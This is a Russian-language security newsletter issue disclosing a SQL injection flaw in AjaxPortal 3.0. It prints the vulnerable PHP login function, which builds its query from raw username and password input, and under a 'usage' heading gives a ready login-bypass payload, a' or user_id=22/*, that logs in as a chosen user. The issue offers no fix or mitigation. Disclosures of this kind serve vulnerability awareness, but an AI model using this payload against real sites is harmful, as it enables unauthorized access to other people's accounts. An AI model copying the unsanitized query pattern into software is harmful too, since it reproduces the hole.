Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в AjaxPortal.


Компьютер для продвинутых пользователей
В этом выпуске:
AjaxPortal
ПО: AjaxPortal
Версия: 3.0

О AjaxPortal:
AjaxPortal это основанный на Sajax-технологии проект с открытым исходным кодом, позволяющий программировать сайт используя Ajax-фреймы известные как XMLHTTPRequest или удаленные скрипты. Комплекс написан на PHP и использует JavaScript и MySQL.
Уязвимость:
Код ошибки в ajaxp.php:
function loginADP($username,$password,$remember){
$badlogin = 0;
if(isLoggedIn()){ return "Sucsess!"; }
$query = "SELECT * FROM ".PREFIX."ajaxp_users
WHERE username='$username' AND
password=PASSWORD('$password') AND active=1 LIMIT 1";
$result = mysql_query($query);
if(mysql_num_rows($result) > 0){
$userinfo = mysql_fetch_array($result);
$_SESSION['sess_username'] = $userinfo['username'];
$_SESSION['sess_firstname'] = $userinfo['firstname'];
$_SESSION['sess_lastname'] = $userinfo['lastname'];
$_SESSION['sess_userid'] = $userinfo['user_id'];
$_SESSION['sess_accesslevel'] = $userinfo['accesslevel'];
$_SESSION['sess_usermd5'] = $userinfo['md5'];
$_SESSION['sess_theme_id'] = $userinfo['theme_id'];
$_SESSION['sess_last_ip'] = $_SERVER['REMOTE_ADDR'];
$_SESSION['sess_logged_in'] = 1;
$query = "UPDATE ".PREFIX."ajaxp_users SET last_login=NOW(),
last_ip=\"".$_SERVER['REMOTE_ADDR']."\" WHERE user_id=".$userinfo['user_id']."";
mysql_query($query);
if($remember==1)
{$_SESSION['remember']=$userinfo['user_id'];} else {
unset($_SESSION['remember']); }
$badlogin = 0;
return "Sucsess!";
} else {
$badlogin = 1;
}

Использование:
Username:a' or user_id=22/*
Password:abcdef
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное